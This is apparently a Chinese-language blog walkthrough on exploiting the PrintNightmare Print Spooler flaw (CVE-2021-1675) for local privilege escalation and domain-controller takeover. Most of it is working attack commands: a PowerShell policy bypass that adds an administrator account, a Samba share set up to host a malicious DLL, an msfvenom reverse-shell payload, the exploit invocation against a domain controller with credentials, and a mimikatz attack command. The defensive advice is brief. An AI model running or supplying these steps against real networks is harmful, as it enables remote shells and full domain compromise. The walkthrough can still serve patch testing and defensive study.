目录
漏洞概述
Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。
影响版本
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
漏洞复现
一、PowerShell脚本实现本地提权
1、确保Windows Print Spooler服务启用
运行输入“services.msc”打开服务,启用Print Spooler服务。
Exp
https://github.com/calebstewart/CVE-2021-1675
2、powershell绕过安全策略执行
本机实验环境为windows 10 1909专业版
powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString(‘C:\Users\xxx\CVE-20 21-1675.ps1’); Invoke-Nightmare -DriverName “mac” -NewUser “hack” -NewPassword “hack123!”
已经添加到管理员组中
二、Windows Print Spooler RCE域控
1、域控环境为Windows server 2012 R2,域成员环境为window 7
2、此时已经拿到一个普通域成员用户,利用该漏洞去攻击域控服务器。
3、在攻击端设置好samba服务
[global]
workgroup = workgroup
server string = test
netbios name = MZ
security = user
map to guest = Bad User
smb ports = 445
log file = /var/log/samba/log.%m
max log size = 5
[smb]
comment = Samba
browseable = yes
writeable = yes
public = yes
path = /tmp/
read only = no
guest ok = yes
MSF上线
生成dll文件,放到共享目录tmp下
msfvenom -p windows/x64/shell_reverse_tcp lhost=ip lport=4444 -f dll -o payload.dll
设置监听
Windows server 2012貌似不行报Error: code: 0x5 - rpc_s_access_denied 错误,因为只能上传恶意dll文件,不能执行。
尝试Windows server 2019
Windows server 2019开启samba服务问题
https://cloud.tencent.com/developer/article/1528657
实验前关闭防火墙或者杀毒软件,方便实验
执行设置exp参数
CVE-2021-1675.py pte.com/testuser:123456Abc@192.168.1.10 '\\192.168.1.40\smb\payload.dll'
AD域名/普通域用户:用户密码@域控地址 ‘恶意dll文件共享地址’
Cobalt Strike上线
三、mimikatz武器化攻击
运行mimikatz,输入以下命令
misc::printnightmare /library:\\192.168.1.40\smb\payload.dll /server:192.168.1.10 /authuser:testuser /authdomain:pte.com /authpassword:123456Abc
这里就很奇怪他报错还能弹shell
在CS上线上就不报错。。。
漏洞防御
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675
禁用samba服务于Print Spooler服务
运行中输入”services.msc”选择print spooler服务禁用。
参考链接
GitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of CVE-2021-1675/PrintNightmare
CVE-2021-1675 Windows Spooler Service RCE (qq.com)
GitHub - calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)
https://github.com/gentilkiwi/mimikatz